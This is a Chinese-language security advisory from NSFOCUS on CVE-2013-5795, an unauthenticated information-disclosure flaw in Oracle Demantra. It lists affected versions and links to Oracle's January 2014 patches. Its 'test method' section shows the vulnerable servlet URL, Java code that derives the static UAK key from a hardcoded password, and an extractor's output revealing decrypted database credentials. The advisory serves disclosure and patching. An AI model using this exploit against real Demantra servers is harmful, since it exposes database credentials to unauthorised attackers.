安全研究

安全漏洞
Oracle Supply Chain Products Suite远程安全漏洞(CVE-2013-5795)

发布日期:2014-01-14
更新日期:2014-03-03

受影响系统:
Oracle Supply Chain Products Suite 9.3.1
Oracle Supply Chain Products Suite 9.3.0.2
Oracle Supply Chain Products Suite 7.3.1
Oracle Supply Chain Products Suite 7.3.0
Oracle Supply Chain Products Suite 7.2.0.3 SQL-Server
描述:
BUGTRAQ  ID: 64846
CVE(CAN) ID: CVE-2013-5795

Oracle Demantra Demand Management是需求管理软件。

Oracle Demantra Demand Management 7.2.0.3 SQL-Server,  7.3.0,  7.3.1,  12.2.1,  12.2.2,  12.2.3版本在实现上存在安全漏洞,可使远程攻击者利用此漏洞获取敏感信息。

<*来源:Oracle
  
  链接:http://secunia.com/advisories/56474
        http://www.exploit-db.com/exploits/31995/
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

Details:

Demantra has a backend function that allows anyone to retrieve the database instance name and the corresponding credentials.
Impact:

A remote, unauthenticated attacker could exploit this issue in combination with other found issues, to extract the database credentials and instance name.
Exploit:

The target URL is:

http://target.com:8080/demantra/ServerDetailsServlet?UAK=

Now the UAK key is calculated statically:

  String encryptedPassword = new String(CryptographicService.encodeHashStringHex("er6Us8wB", "SHA-256"));

      StringBuffer tmp = new StringBuffer("sge");
      tmp.append(0);
      tmp.append(encryptedPassword);

      uak = new String(CryptographicService.encodeHashStringHex(tmp.toString(), "SHA-256"));

From that information it is possible to create a simple extractor:

pixel:demantra user$ java getUAK
-=[Oracle Demantra Database Details Retriever ]=-

[+] UAK Key is: 406EDC5447A3A43551CDBA06535FB6A661F4DC1E56606915AC4E382D204B8DC1
[+] Retrieved the following encrypted string:
4,21,3,4,111,36,53,35,36,111,52,53,61,49,62,36,34,49,111,63,34,51,111,97,
[+] Decrypted string is:
TEST?test?demantra?orc?1

Together with the authentication bypass this can be exploited unauthenticated as well.

建议:
厂商补丁:

Oracle
------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:

http://www.oracle.com/technetwork/topics/security/

http://www.oracle.com/technetwork/topics/security/cpujan2014-1972949.html#AppendixSCP
http://www.oracle.com/technetwork/topics/security/cpujan2014verbose-1972951.html#SCP

浏览次数:2110
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障
关于我们
公司介绍
公司荣誉
公司新闻
联系我们
公司总部
分支机构
海外机构
快速链接
绿盟云
绿盟威胁情报中心NTI
技术博客